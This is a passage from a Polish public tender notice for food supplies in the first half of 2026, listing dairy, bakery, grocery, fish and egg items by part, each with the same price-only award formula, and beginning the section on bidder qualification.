class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Dżem truskawkowy (100g owoców/na 100g dżemu) 220g	100	szt.<br/>2. Dżem czarna porzeczka (100g owoców/na 100g dżemu) 220g	100	szt.<br/>3. Dżem wiśniowy (100g owoców/na 100g dżemu) 220g	100	szt.<br/>4. Dżem morelowy (100g owoców/na 100g dżemu) 220g	100	szt.<br/>5. Dżem brzoskwiniowy (100g owoców/na 100g dżemu) 220g	50	szt.<br/>6. Powidła śliwkowe 240g	25	szt.<br/>7. Jogurt naturalny 150g	300	szt.<br/>8. Jogurt naturalny grecki 400g	125	szt.<br/>9.	Jogurt kremowy z owocowym wsadem 118 g	200	szt.<br/>10.	Jogurt owocowy bez cukru 150 g	500	szt.<br/>11. Jogurt owocowy 150g	1000	szt.<br/>12. Kefir 200g	1150	szt.<br/>13. Masło extra 82% tł. 200g	2850	szt.<br/>14. Mleko 2% 0,9 l - folia	5500	szt.<br/>15. Mleko 2% 1,0 - karton	100	szt.<br/>16. Mleko zagęszczone niesł. 500g 4%tł.	60	szt.<br/>17. Margaryna mleczna 250g	200	szt.<br/>18.	Oliwa z oliwek 250 ml	5	szt.<br/>19. Olej 1,0 l rzepakowy	70	szt.<br/>20. Ser maskarpone 250g	50	szt.<br/>21. Pasztet drobiowy 50g	1000	szt.<br/>22. Ser żółty twardy salami kl.	30	kg<br/>23.	Ser żółty podpuszczkowy, dojrzewający typu holenderskiego kl.	50	kg<br/>24.	Ser żółty wędzony kl.	50	kg<br/>25. Ser żółty pełnotłusty typ holendersko-szwajcarski kl.	50	kg<br/>26. Ser topiony kremowy 100g	1000	szt.<br/>27. Ser homogenizowany naturalny 150g	800	szt.<br/>28.	Ser mozzarella 125 g	200	szt.<br/>29.	Ser feta 270g	50	szt.<br/>30. Ser twarogowy kanapkowy 150g	200	szt.<br/>31. Śmietana 18% 200g	500	szt.<br/>32. Twaróg półtłusty 250	kg<br/>33. Ser homog. Owocowy 150g	1750	szt.<br/>34.	Serek ziarnisty z owocowym wsadem 150g	200	szt.<br/>35. Twaróg ziarnisty 200g	360	szt.<br/>36. Ser domowy smażony chudy	100	kg<br/>37. Śmietana spray 250g	25	szt.<br/>38. Śmietana 36% 500g	50	szt.<br/>39.	Skyr owocowy 150 g	50	szt.<br/>40.	Skyr naturalny 150g	100	szt.<br/>41. Ser pleśniowy camembert 120g	250	szt.<br/>42. Masło roślinne kubek 500g	40	szt.<br/>43.	Ser śmietankowy do smarowania - różne smaki 135g	200	szt.<br/>44.	Ser topiony 140g -8szt. (różne smaki)	200	szt.<br/>45.	Ser naturalny (mleko pasteryzowane, kultury bakterii mleczarskich) typu bieluch lub równoważny 150g	500	szt.<br/>46.	Deser mleczny czekoladowo orzechowy 150g	500	szt.<br/>47. Deser na bazie maślanki-różne smaki (maślanka 60%) typu Mlekpol lub równoważne 170g	500	szt.<br/>48.	Maślanka 1l	20	szt.<br/>49.	Twaróg solankowy wędzony 250g	100	szt.<br/>50.	Deser z bitą śmietaną 175g (czekoladowy, waniliowy)	100	szt.<br/>51.	Twaróg sernikowy mielony w wiaderku 1kg	20	szt.<br/>52.	Serek śmietankowy z ziołami w plastrach 150g	200	szt.<br/>53.	Deser mleczny z ryżem i sosem 200g	200	szt.<br/>53. Dżem 25g	500	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15332200-6 - Dżemy i marmolady, galaretki owocowe, przeciery z owoców i orzechów oraz pasty do smarowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Bułka tarta	30	kg<br/>2.	Bułka pszenna 50 g	7500	szt.<br/>3.	Baton 400 g	20	szt.<br/>4.	Chleb mieszany 1.0 kg	3100	szt.<br/>5.	Chałki 350 g	1100	szt.<br/>6.	Chleb razowy z mąki żytniej 800 g	125	szt.<br/>7.	Bułka grahamka 1000	szt. <br/>8.	Ciasto serowo-wiśniowe	25	kg<br/>9.	Ciasto serowo- makowe	20	kg<br/>10.	Babka czekoladowa	20	kg<br/>11.	Drożdżówki 80-100 g (ser, budyń, marmolada)	400	szt.<br/>12.	Sernik na drożdżowym spodzie	30	kg<br/>14.	Ciasto jogurtowe z owocami	30	kg<br/>16.	Bułki cynamonowe	30	kg<br/>17.	Sernik na ciemnym spodzie	40	kg<br/>18.	Rogaliki półfrancuskie z marmoladą	20	kg<br/>19.	Rogaliki półfrancuskie z serem	20	kg<br/>20.	Rogal maślany 200	szt.<br/>21.	Pączki	200	szt.<br/>22.	Szarlotka na cieście kruchym	30	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15811000-6 - Pieczywo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15812000-3 - Wyroby ciastkarskie i ciasta</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Bazylia 20 g 25	szt.<br/>2.	Biszkopty (galaretką 52%, polewa czekoladowa 15%) 30	kg<br/>3.	Biszkopty bez cukru 100 g (mąka pszenna, masa jajowa pasteryzowana, substancja słodząca - maltitol, woda, emulgatory)	100	szt.<br/>4.	Biszkopty podłużne 140 g (mąka, jajka, cukier i sól) - 50 szt.	50	szt.<br/>5.	Brzoskwinie w puszce połówki 820 g 100	szt.<br/>6.	Budyń bez cukru i sztucznych barwników 40 g 400	szt.<br/>7.	Ciastka b/c 70 - 125 g 125	szt.<br/>8.	Ciastka kruche o smaku maślanym	24	kg<br/>9.	Ciastka rurki z kremem (cukier, tłuszcz palmowy, mąka pszenna, mleko w proszku (z mleka), mąka pszenna częściowo skleikowana, glukoza, barwniki: karmel, aromaty, emulgator: lecytyna)	24	kg<br/>10.	Ciastka w czekoladzie mlecznej 35%	24	kg<br/>11.	Cukier kryształ 1 kg	750	kg<br/>12.	Cukier puder 400 g	5	kg<br/>13.	Cukier wanilinowy 16 g	75	szt.<br/>14.	Curry 10 g 10	szt.<br/>15.	Cynamon 15 g 50	szt.<br/>16.	Czekolada gorzka 100 g 60% kakao	150	szt.<br/>17.	Czekolada mleczna 100 g 30% kakao	200	szt.<br/>18.	Czosnek granulowany 10 g	30	szt.<br/>19.	Czosnek niedźwiedzi 10 g	30	szt.<br/>20.	Fasola czerwona konserwowa 400 g 50	szt.<br/>21.	Galaretka owocowa (cukier, żelatyna, regulator kwasowości (kwas cytrynowy), barwnik, aromat) 75 g 175	szt.<br/>22.	Gałka muszkatołowa mielona 10 g	10	szt.<br/>23.	Goździki całe 10 g	5	szt.<br/>24.	Groszek konserwowy 400 g	50	szt.<br/>25.	Herbata czarna expressowa z naturalnym aromatem 50 szt. typu Lipton lub równoważna	30	szt.<br/>26.	Herbata czarna liściasta 100 g 500	szt.<br/>27.	Herbata mięta expressowa 20 szt.	20	szt.<br/>28.	Herbata owocowa expressowa 20 szt.	50	szt.<br/>29.	Herbata rumianek expressowa 20 szt. 20	szt.<br/>30.	Herbatniki 16 g (mąka pszenna, cukier, oleje roślinne: palmowy, rzepakowy, częściowo utwardzony palmowy, częściowo utwardzony rzepakowy, kokosowy, syrop cukru inwertowanego, serwatka w proszku (z mleka), tłuszcz roślinny (palmowy, częściowo utwardzony palmowy), emulgator (lecytyna sojowa) 500	szt.<br/>31.	Herbatniki Petit Beurre 100 g (mąka pszenna, cukier, tłuszcz roślinny (palmowy, częściowo utwardzony palmowy), syrop cukru inwertowanego, serwatka w proszku (z mleka), skrobia, emulgator (lecytyna sojowa), sól, substancje spulchniające, aromat)	250	szt.<br/>32.	Imbir 20 g	10	szt.<br/>33.	Kakao naturalne 100% 180 g (kartonik)	30	szt.<br/>34.	Kasza gryczana 1 kg	50	kg<br/>35.	Kasza jęczmienna średnia 1kg	40	kg<br/>36.	Kasza kuskus 1 kg	10	kg<br/>37.	Kasza manna 1 kg	75	kg<br/>38.	Kasza bulgur 1 kg	20	kg<br/>39.	Kawa naturalna rozpuszczalna klasyczna 200 g typu Nescafe lub równoważna 50	szt.<br/>40.	Kawa zbożowa rozpuszczalna (zboża 78% - jęczmień, żyto, cykoria) typu Inka lub równoważna.	225	szt.<br/>41.	Ketchup 600 g (Ketchup łagodny 480 g - pomidory 193g na 100g keczupu, cukier, ocet, sól, skrobia, aromaty, zioła, przyprawy)	30	szt.<br/>42.	Kisiel bez cukry 40 g 400	szt.<br/>43.	Kleik ryżowy 160 g 20	szt.<br/>44.	Kminek mielony 20 g 40	szt.<br/>45.	Koncentrat barszczu czerwonego 300 ml w szklanym opakowaniu (zagęszczony sok z buraków ćwikłowych (57 %) woda, cukier, sól, regulator kwasowości - kwas cytrynowy, warzywa i ekstrakty warzywne, przyprawy i ekstrakty przypraw aromaty) 50	szt.<br/>46.	Koncentrat pomidorowy 190 g w szklanym opakowaniu (Koncentrat pomidorowy 30% 200 g na 200 g słoiczka koncentratu (1kg pomidorów świeżych) 150	szt.<br/>47.	Koperek suszony 20 g 30	szt.<br/>48.	Krakersy mix. drobne 90 g 500	szt.<br/>49.	Kukurydza konserwowa 400 g 50	szt.<br/>50.	Listki waflowe b/c 38 g 75	szt.<br/>51.	Liść laurowy 10 g 30	szt.<br/>52.	Liść lubczyk suszony 20 g 25	szt.<br/>53.	Majeranek otarty 10 g 50	szt.<br/>54.	Majonez 400 ml (bez konserwantów w szklany opakowaniu) 25	szt.<br/>55.	Mak mielony 1 kg 2	kg<br/>56.	Makaron 400 g świderki, łazanka kolanka, muszelka 100% durum 125	kg<br/>57.	Makaron gwiazdka 250 g (5jajeczny-mąka makaronowa pszenna jaja płynne 23%) 40	kg<br/>58.	Makaron krajanka 4 jajeczna 250 g (mąka makaronowa pszenna, jaja płynne 23%)	75	kg<br/>59.	Makaron łezki 250 g (mąka makaronowa z pszenicy zwyczajnej, mąka makaronowa z pszenicy durum (semolina), jaja płynne pasteryzowane, chłodzone 20 %, woda, kurkuma-przyprawa) 30	kg<br/>60.	makaron lasagne płaty 500 g (semolina z pszenicy durum)	15	kg<br/>61.	Makaron pełnoziarnisty 400 g (Mąka makaronowa pełnoziarnista żytnia (53%), pszenna. Produkt może zawierać soję)	50	kg<br/>62.	Mąka pszenna 1 kg	130	kg<br/>63.	Mąka ziemniaczana 1 kg	50	kg<br/>64.	Mieszanka grzybów suszonych 500 g (borowik szlachetny, podgrzybek brunatny, maślak zwyczajny i koźlarz czerwony) 100g	10	szt.<br/>65.	Mieszanka owoców suszonych świątecznych kompotowych 300g	10	szt.<br/>66.	Migdały płatki 75g	10	szt.<br/>67.	Miód sztuczny 380 g 5	szt.<br/>68.	Miód wielokwiatowy 25 g 1500	szt.<br/>69.	Morele w puszce 820 g	20	szt.<br/>70.	Mus owocowo-warzywny 100 g	500	szt.<br/>71.	Musztarda 210 g 200	szt.<br/>72.	Napój kakaowy granulowany 300 g 10	szt.<br/>73.	Ocet spirytusowy 500 ml 15	szt.<br/>74.	Ogórki konserwowe 900 g 60	szt.<br/>75.	Oliwki czarne 350 g drylowane	10	szt.<br/>76.	Oliwki zielone 350 g drylowane	10	szt.<br/>77.	Oregano suszone 10 g	25	szt.<br/>78.	Pałki kukurydziane 50 g 200	szt.<br/>79.	Papryka mielona ostra 20 g 20	szt.<br/>80.	Papryka mielona ostra wędzona 20 g	20	szt.<br/>81.	Papryka mielona słodka 20 g 65	szt.<br/>82.	Papryka mielona słodka wędzona 20 g 30	szt.<br/>83.	Passata pomidorowa 500 g (pomidory 99,5%, sól) 40	szt.<br/>84.	Pieczarki marynowane 480 g 10	szt.<br/>85.	Pieprz cytrynowy mielony 20 g	10	szt.<br/>86.	Pieprz czarny mielony 20 g 125	szt.<br/>87.	Pieprz ziołowy mielony 20 g 30	szt.<br/>88.	Pierniki gwiazdka z nadzieniem śliwkowym w czekoladzie	30	kg<br/>89.	Pietruszka suszona 20 g 30	szt.<br/>90.	Płatki kukurydziane 250 g 100	szt.<br/>91.	Płatki owsiane 500 g 125	szt.<br/>92.	Pomidory krojone w puszce bez skórki w soku pomidorowym 400 g 50	szt.<br/>93.	Pomidory suszone w oleju 290 g	20	szt.<br/>94.	Proszek do pieczenia 30 g (substancje spulchniające: węglan sodu E500, difosforan E450, mąka pszenna) 50	szt.<br/>95.	Przyprawa do kurczaka 25 g 30	szt.<br/>96.	Przyprawa do piernika 20 g 5	szt.<br/>97.	Przyprawa do potraw 200 g (sól, warzywa suszone (15,5%): marchew, pasternak, ziemniak, cebula, natka pietruszki, korzeń selera, por, kapusta, korzeń pietruszki, pomidor, czosnek, papryka słodka; wzmacniacze smaku: glutaminian monosodowy, 5&#39;-rybonukleotydy disodowe; cukier, skrobia, pieprz czarny, barwnik: ryboflawina. 40	szt.<br/>98.	Przyprawa do ryb 20 g 20	szt.<br/>99.	Przyprawa w płynie do zup i drugich dań 1000 ml (woda, sól, wzmacniacze smaku (glutaminian monosodowy, 5&#39;-rybonukleotydy disodowe), ocet, wyciąg z lubczyku, glukoza, ekstrakt drożdży, aromat) 30	szt.<br/>100.	Rodzynki sułtańskie 200g 50	szt.<br/>101.	Ryż biały długoziarnisty	100	szt.<br/>102.	Soda oczyszczona 35 g 10	szt.<br/>103.	Sok owocowy 100% w kartoniku 200 ml (bez dodatku cukru i innych substancji słodzących) szt.<br/>104.	Sok owocowy 100% w szklanej butelce 330 ml (bez dodatku cukru i innych substancji słodzących) (jabłko, pomarańcz, czarna porzeczka, multiwitamina)	500	szt.<br/>105.	Sok warzywny w kartoniku 500ml (Przecier marchwiowy, sok pomidorowy (29%) z zagęszczonego soku, sok jabłkowy (18%) z zagęszczonego soku, woda, przeciery z: pietruszki, brokuła, papryki (1%) i cebuli, oliwki (0,5%	200	szt.<br/>106.	sok pomidorowy w szklanej butelce 330 ml (odtworzony z zagęszczonego soku pomidorowego (99,5%), sól)	500	szt.<br/>107.	Sól 110	kg<br/>108.	Suchary b/c 285 g	40	szt.<br/>109.	Śliwki suszone bez pestek 1 kg 5	kg<br/>110.	Wafle przekładane masą kakaową lub orzechową typu pischinger	24	kg<br/>111.	Wafle ryżowe 130 g 200	szt.<br/>112.	Wafle w czekoladzie (cukier, mąka pszenna, olej palmowy, serwatka w proszku [z mleka], tłuszcz kakaowy, odtłuszczone mleko w proszku, miazga kakaowa, kakao w proszku obniżonej zawartości tłuszczu, tłuszcz mleczny, skrobia ziemniaczana, olej rzepakowy, emulgatory lecytyna sojowa) 50 g	300	szt.<br/>113.	Wafle w czekoladzie mlecznej 35%	24	kg<br/>114.	Wafle z nadzieniem b/cukru, glutenu, laktozy 95 g 80	szt.<br/>115.	Ziele angielskie 15 g 50	szt.<br/>116.	Zioła prowansalskie 20 g 30	szt.<br/>117.	Żelatyna 50 g 80	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Makrela wędzona 40	kg<br/>2. Miruna b/s SHP	200	kg<br/>3. Filet śledziowy ala matjas 80	kg<br/>4. Filet śledziowy opiekany 50	kg<br/>5.	Łosoś wędzony filet	10	kg<br/>6. Filet z makreli w pomidorach 170 g	200	szt.<br/>7. Tuńczyk w kawałkach w oleju 170g	100	szt.<br/>8. Tuńczyk w sosie własnym 170g	100	szt.<br/>9.	Paluszki rybne (filet z ryb białych 65 %, panierka sypka 15%, olej rzepakowy, mąka pszenna) 450g	50	op<br/>10.	Śledź w kawałkach z cebulką opakowanie 100g (50% filety ze śledzia atlantyckiego, 30% cebula marynowana, 20% olej rzepakowy) 200	szt.<br/>11. Paprykarz szczeciński 135g	200	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Jajka dezynfekowane promieniami UV rozm. L (63g-73g)	8000	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga złożenia do oferty oświadczenia o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania w zakresie jak we wzorze oświadczenia, który stanowi załącznik nr 3 do SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia z postępowania na dzień składania ofert.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony FORMULARZ OFERTOWY - który stanowi Załącznik nr 2 <br/>Do oferty należy dołączyć aktualne dokumenty potwierdzające status prawny Wykonawcy, np. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. Oferta nie musi zawierać tych dokumentów w przypadku wskazania przez Wykonawcę, że są one dostępne w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych. FORMULARZ OFERTOWY musi zawierać oświadczenie Wykonawcy w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.<br/>2)	FORMULARZ CENOWY – stanowiący Załącznik nr 1 SWZ; formularz cenowy powinien być wypełniony w zależności od części zamówienia, na którą składana jest oferta. Wykonawca składający ofertę na daną część zobowiązany jest zaoferować pełny asortyment (wszystkie produkty) objęty niniejszą częścią w ilościach wymaganych przez Zamawiającego, pominięcie, usunięcie lub przekreślenie produktu może stanowić o niezgodności oferty z treścią SWZ i stanowić podstawę do odrzucenia oferty. <br/>Wykonawca jest zobowiązany spełniać wymogi Polskich Norm, zasad GMP/GHP (Dobra Praktyka Produkcyjna, Dobra Praktyka 